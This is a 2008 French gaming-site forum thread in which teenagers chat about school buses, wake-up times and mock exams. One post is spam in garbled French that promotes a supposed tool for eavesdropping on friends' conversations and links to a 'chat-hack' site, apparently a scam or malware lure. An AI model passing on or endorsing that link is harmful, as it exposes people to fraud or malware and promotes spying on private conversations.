CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Liste des sujets

~Topic du modérateur~

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:16:44

Ah j'ai failli le louper une fois mon bus ! :fou:
:dehors: :noel:

Devil-Shaman
Devil-Shaman
Niveau 40
18 février 2008 à 17:17:40
  1. dunkan Ignorer dunkan Voir le profil de dunkan
  2. Posté le 18 février 2008 à 16:59:34 Avertir un modérateur
  3. :rire: respect Kévin :bave: j'en ai perdu aucun, pour n'en gagner aucun bien sur :cool: neuf vaincra :( sponsor de l'OM c'est fait exprès. :(

~~> Moi je suis passé de 4,5 à 13,5. :bave:
La prof de l'année dernière parlait pratiquement qu'espagnol, un peu chiante. :(

  1. The_Abalo Ignorer the_abalo Voir le profil de The_Abalo
  2. Posté le 18 février 2008 à 17:16:44 Avertir un modérateur
  3. Ah j'ai failli le louper une fois mon bus ! :fou:

~~> C'était les aventures trépidantes d'Abalo. :cool: :noel:
________________________________________________
Vous aimez les musiques de jeux vidéo ? Rejoignez-nous.
http://www.ostmadness.com/index.php ~ Site en construction

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:17:48

Pour la peine, demain je fais 40min. :(

dunkan
dunkan
Niveau 69
18 février 2008 à 17:18:18

Trop fort Kévin :bave: ptdr ! :rire:

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:18:26

Kevin :d) Le HS du jour. :noel:

maxlamenace33
maxlamenace33
Niveau 10
18 février 2008 à 17:18:44

Chiant de rater le bus... :(
Moi tout les jours, quand je sors du lycée, je fais 50 mètres... Je vois le bus arriver au fond de la rue. Donc je suis obligé de courir en murmurant des injures tel que, je cite : "Eh merde, saloperie de bus qui est tout le temps en retard sauf aujourd'hui!" :o))

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:19:51

Moi je pars à 7h52 de chez moi, j'arrive à l'arrête de bus, puis 10sec après le bus arrive, à 7h54 je suis dedand, ready for the Collège. :bave: :noel:

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:20:19

dedans*

dunkan
dunkan
Niveau 69
18 février 2008 à 17:20:24

Moi c'est mon père qui m'amène le matin.

VySe128
VySe128
Niveau 10
18 février 2008 à 17:20:42

Olive :d) Je confond grave et grâce, tu vois. :noel:
Bien observé en tout cas.

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:20:50

( Comment je raconte ma life. :noel: )

]Espio[
]Espio[
Niveau 5
18 février 2008 à 17:21:13

Hey ici est pu écouté un programme avec lui on les conversations de tes amis, qu'il fonctionne vraiment cent pour cent, clique simplement sur ce link: http://chat-hack.com/?s=mx&d=54978bf7b2a1c6588cc21ce44534978e

dunkan
dunkan
Niveau 69
18 février 2008 à 17:21:32
  1. VySe128 Voir le profil de VySe128
  2. Posté le 18 février 2008 à 17:20:42 Ignorer vyse128 Avertir un modérateur
  3. Olive :d) Je confond grave et grâce, tu vois. :noel:

Bien observé en tout cas.

Mode « révision bac français » :( :hap:

maxlamenace33
maxlamenace33
Niveau 10
18 février 2008 à 17:22:03

La Seconde 4 est une des secondes la plus pourrie. Devinez quoi? Je suis en 2°4... :hum: :o)) :fou:

VySe128
VySe128
Niveau 10
18 février 2008 à 17:22:44

Cassepieds :d) Pareil, à croire qu'on prend le même bus^^
Moi, je sors à 6h55 pour le prendre à 7h00 pile

VySe128
VySe128
Niveau 10
18 février 2008 à 17:23:30

Olive :d) Putain, c'est vrai que j'ai bac blanc de français après les vacances... :hum:

The_Abalo
The_Abalo
Niveau 10
18 février 2008 à 17:23:57

Moi Brevet blanc. :(

dunkan
dunkan
Niveau 69
18 février 2008 à 17:24:00
  1. VySe128 Voir le profil de VySe128
  2. Posté le 18 février 2008 à 17:22:44 Ignorer vyse128 Avertir un modérateur
  3. Moi, je sors à 6h55 pour le prendre à 7h00 pile

Du matin ? :ouch2:
Je me lève à sept heures... et quart moi. x)

Devil-Shaman
Devil-Shaman
Niveau 40
18 février 2008 à 17:24:33
  1. Maxlamenace33 Ignorer maxlamenace33 Voir le profil de Maxlamenace33
  2. Posté le 18 février 2008 à 17:18:44 Avertir un modérateur
  3. Chiant de rater le bus... :(

Moi tout les jours, quand je sors du lycée, je fais 50 mètres... [...]

~~> Moi ça va, y a un arrêt spécial pour mon lycée, donc c'est juste à côté de l'entrée. :noel:
________________________________________________
Vous aimez les musiques de jeux vidéo ? Rejoignez-nous.
http://www.ostmadness.com/index.php ~ Site en construction :mac:

dunkan
dunkan
Niveau 69
18 février 2008 à 17:24:33
  1. VySe128 Voir le profil de VySe128
  2. Posté le 18 février 2008 à 17:23:30 Ignorer vyse128 Avertir un modérateur
  3. Olive :d) Putain, c'est vrai que j'ai bac blanc de français après les vacances... :hum:

Copain :coeur: tu crois que c'est pour quoi les quinze textes que je dois préparer... oral blanc. :nonnon:

Sujet fermé pour la raison suivante : Topic verrouillé.
Sous forums
  • Ceci est un test. :(
  • Leave Leila Alone #TeamGrosDoigt
  • Soirée d'anniversaire de Blue
La vidéo du moment